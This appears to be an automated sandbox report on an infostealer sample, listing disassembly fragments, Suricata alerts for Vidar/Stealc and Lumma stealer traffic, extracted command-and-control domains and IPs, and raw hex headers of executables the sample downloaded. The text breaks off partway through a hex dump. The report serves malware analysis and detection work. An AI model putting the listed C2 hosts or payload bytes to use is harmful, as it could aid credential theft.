Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh	15_2_00346A38
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+000006B8h]	15_2_0031AA47
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	15_2_00324AD8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+40h]	15_2_0030EAC6
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], A70A987Fh	15_2_0033CB36
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov byte ptr [edi], al	15_2_00330B22
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	15_2_0030CB78
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov byte ptr [edi], al	15_2_00330B43
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	15_2_00346BB8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh	15_2_00346BB8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	15_2_0032AC81
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov word ptr [eax], cx	15_2_00324D38
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+40h]	15_2_0030ED6B
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	15_2_00322D48
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+00h]	15_2_00308D88
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	15_2_0033CE48
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov word ptr [edx], 0000h	15_2_0031CEB7
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then jmp ecx	15_2_00342EAE
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h	15_2_00344E98
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	15_2_00344E98
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then jmp eax	15_2_00326EC4
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh	15_2_0032CF30
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	15_2_00330F18
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+14h]	15_2_00330F18
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h	15_2_00340F18
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then jmp ecx	15_2_00342F6C
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	15_2_00310F6F
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov word ptr [eax], dx	15_2_0031F138
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov word ptr [esi], ax	15_2_0031F138
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov ebp, eax	15_2_003071D8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	15_2_0032F2B8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh	15_2_00343290
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	15_2_003293AF
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh	15_2_00343390
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	15_2_0031340E
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h]	15_2_00305468
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	15_2_0032B56A
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov word ptr [eax], dx	15_2_0031F540
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	15_2_003436C7
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 27BAF212h	15_2_00343833
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h	15_2_00325824
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	15_2_00301878
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h	15_2_00341918
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	15_2_0032DA58
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp word ptr [eax+esi+02h], 0000h	15_2_0032BB20
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov word ptr [edx], ax	15_2_00327B69
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then jmp eax	15_2_00327B48
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h	15_2_00329BA8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	15_2_00329BA8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h	15_2_00329BA8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then jmp eax	15_2_00325C1B
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	15_2_00345C62
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	15_2_00313CBA
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov edi, ecx	15_2_00311D02
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	15_2_00303D78
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	15_2_0030DDC4
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	15_2_00313E69
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov ecx, dword ptr [edx]	15_2_002FDED8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then dec ebx	15_2_0033BF08
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	15_2_0032FF74
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then jmp ecx	15_2_00305FB0
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	15_2_00309FE8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	15_2_00309FE8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	15_2_0032FFD5

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.7:49853 -> 95.164.90.97:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.164.90.97:80 -> 192.168.2.7:49853
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 95.164.90.97:80 -> 192.168.2.7:49853
Source: Network traffic	Suricata IDS: 2056514 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frizzettei .sbs) : 192.168.2.7:51900 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056524 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wickedneatr .sbs) : 192.168.2.7:52606 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056510 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (exemplarou .sbs) : 192.168.2.7:61961 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056518 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (isoplethui .sbs) : 192.168.2.7:62836 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056516 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (invinjurhey .sbs) : 192.168.2.7:61484 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056520 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (laddyirekyi .sbs) : 192.168.2.7:59173 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056512 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (exilepolsiy .sbs) : 192.168.2.7:60201 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.7:49989 -> 45.132.206.251:80
Source: Network traffic	Suricata IDS: 2056502 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bemuzzeki .sbs) : 192.168.2.7:55998 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49990 -> 104.21.53.8:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49990 -> 104.21.53.8:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: laddyirekyi.sbs
Source: Malware configuration extractor	URLs: frizzettei.sbs
Source: Malware configuration extractor	URLs: bemuzzeki.sbs
Source: Malware configuration extractor	URLs: exemplarou.sbs
Source: Malware configuration extractor	URLs: invinjurhey.sbs
Source: Malware configuration extractor	URLs: isoplethui.sbs
Source: Malware configuration extractor	URLs: exilepolsiy.sbs
Source: Malware configuration extractor	URLs: wickedneatr.sbs
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199786602107
Source: Malware configuration extractor	URLs: https://t.me/maslengdsa

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 02:24:39 GMTContent-Type: application/octet-streamContent-Length: 2459136Last-Modified: Fri, 24 Nov 2023 13:43:06 GMTConnection: keep-aliveETag: "6560a86a-258600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 69 a8 60 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 25 00 d4 20 00 00 ca 04 00 00 00 00 00 7b 44 00 00 00 10 00 00 00 f0 20 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 25 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 db 23 00 f1 36 00 00 9c a2 24 00 28 00 00 00 00 d0 24 00 cc 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 24 00 88 e2 00 00 60 b2 23 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 b1 23 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 24 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 47 d3 20 00 00 10 00 00 00 d4 20 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 91 22 03 00 00 f0 20 00 00 24 03 00 00 d8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 34 7c 00 00 00 20 24 00 00 62 00 00 00 fc 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b4 10 00 00 00 a0 24 00 00 12 00 00 00 5e 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 0e 01 00 00 00 c0 24 00 00 02 00 00 00 70 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 cc 12 00 00 00 d0 24 00 00 14 00 00 00 72 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 35 ff 00 00 00 f0 24 00 00 00 01 00 00 86 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 02:24:44 GMTContent-Type: application/octet-streamContent-Length: 685392Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-a7550"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 02:24:45 GMTContent-Type: application/octet-streamContent-Length: 608080Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-94750"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 02:24:45 GMTContent-Type: application/octet-streamContent-Length: 450024Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-6dde8"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 02:24:46 GMTContent-Type: application/octet-streamContent-Length: 257872Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-3ef50"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 